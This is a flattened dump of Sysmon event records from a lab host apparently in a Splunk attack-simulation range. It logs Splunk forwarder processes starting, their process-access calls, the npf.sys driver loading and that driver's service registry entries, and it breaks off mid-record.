10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.283{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.798{59A5CD1D-8EEB-6005-DF00-00000000A301}35442320C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+201f2b|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6c153|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.798C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 13241300x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 13241300x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.627{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 